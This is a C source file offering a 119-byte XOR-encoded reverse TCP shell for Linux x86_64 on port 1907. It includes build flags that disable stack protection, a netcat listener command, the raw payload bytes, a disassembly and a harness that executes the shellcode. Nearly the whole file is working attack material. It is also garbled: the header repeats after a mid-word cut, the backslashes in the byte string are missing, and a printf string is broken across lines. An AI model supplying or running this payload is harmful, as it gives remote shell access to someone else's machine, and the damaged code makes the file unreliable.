/*
reverse shell tcp (1907) port shellcode C language - Linux/x86_64
Author : Kagan Capar
contact: kagancapar@gmail.com
shellcode len : 119 bytes
compil /*
reverse shell tcp (1907) port shellcode C language - Linux/x86_64
Author : Kagan Capar
contact: kagancapar@gmail.com
shellcode len : 119 bytes
compilation: gcc -fno-stack-protector -z execstack reverse-shell.c -o reverse-shell
Test:
run your machine: nc -vlp 1907
and run exploit (./reverse-shell)
check shellcode raw and test ls, who, pwd command.
<shellproccod>: 0x48 0x31 0xc9 0x48 0x81 0xe9 0xf6 0xff
<shellproccod+8>: 0xff 0xff 0x48 0x8d 0x05 0xef 0xff 0xff
<shellproccod+16>: 0xff 0x48 0xbb 0xdf 0x4b 0x06 0xb1 0x71
<shellproccod+24>: 0x71 0x46 0x28 0x48 0x31 0x58 0x27 0x48
<shellproccod+32>: 0x2d 0xf8 0xff 0xff 0xff 0xe2 0xf4 0xb5
<shellproccod+40>: 0x62 0x5e 0x28 0x1b 0x73 0x19 0x42 0xde
<shellproccod+48>: 0x15 0x09 0xb4 0x39 0xe6 0x0e 0x91 0xdd
<shellproccod+56>: 0x4b 0x01 0xc2 0x0e 0x71 0x46 0x29 0x8e
<shellproccod+64>: 0x03 0x8f 0x57 0x1b 0x61 0x1c 0x42 0xf5
<shellproccod+72>: 0x13 0x09 0xb4 0x1b 0x72 0x18 0x60 0x20
<shellproccod+80>: 0x85 0x6c 0x90 0x29 0x7e 0x43 0x5d 0x29
<shellproccod+88>: 0x21 0x3d 0xe9 0xe8 0x39 0xfd 0x07 0xbd
<shellproccod+96>: 0x22 0x68 0x9e 0x02 0x19 0x46 0x7b 0x97
<shellproccod+104>: 0xc2 0xe1 0xe3 0x26 0x39 0xcf 0xce 0xd0
<shellproccod+112>: 0x4e 0x06 0xb1 0x71 0x71 0x46 0x28
assembly code is below:
xor %rcx,%rcx
sub $0xfffffffffffffff6,%rcx
lea -0x11(%rip),%rax # 0x555555558060 <shellproccod>
movabs $0x28467171b1064bdf,%rbx
xor %rbx,0x27(%rax)
sub $0xfffffffffffffff8,%rax
loop 0x55555555807b <shellproccod+27>
mov $0x62,%ch
pop %rsi
sub %bl,(%rbx)
jae 0x5555555580a7 <shellproccod+71>
rex.X ficoms -0x19c64bf7(%rip) # 0x55553b8f349e
xchg %eax,%ecx
fisttpll 0x1(%rbx)
retq $0x710e
rex.RX sub %r9d,0x1b578f03(%rsi)
(bad)
sbb $0x42,%al
cmc
adc (%rcx),%ecx
mov $0x1b,%ah
jb 0x5555555580c6 <shellproccod+102>
and %al,0x7e29906c(%rbp)
rex.XB pop %r13
sub %esp,(%rcx)
cmp $0xfd39e8e9,%eax
mov $0x29e6822,%ebp
sbb %eax,0x7b(%rsi)
xchg %eax,%edi
retq $0xe3e1
es cmp %ecx,%edi
rorb 0x6(%rsi)
mov $0x71,%cl
jno 0x55555555811c
sub %al,(%rax)
*/
#include <stdio.h>
#include <string.h>
unsigned char shellproccod[] =
"x48x31xc9x48x81xe9xf6xffxffxffx48x8dx05xefxff"
"xffxffx48xbbxdfx4bx06xb1x71x71x46x28x48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4xb5x62x5ex28x1bx73"
"x19x42xdex15x09xb4x39xe6x0ex91xddx4bx01xc2x0e"
"x71x46x29x8ex03x8fx57x1bx61x1cx42xf5x13x09xb4"
"x1bx72x18x60x20x85x6cx90x29x7ex43x5dx29x21x3d"
"xe9xe8x39xfdx07xbdx22x68x9ex02x19x46x7bx97xc2"
"xe1xe3x26x39xcfxcexd0x4ex06xb1x71x71x46x28";
int main()
{
printf("Shellcode len: %d
", strlen(shellproccod));
int (*ret)() = (int(*)())shellproccod;
ret();
}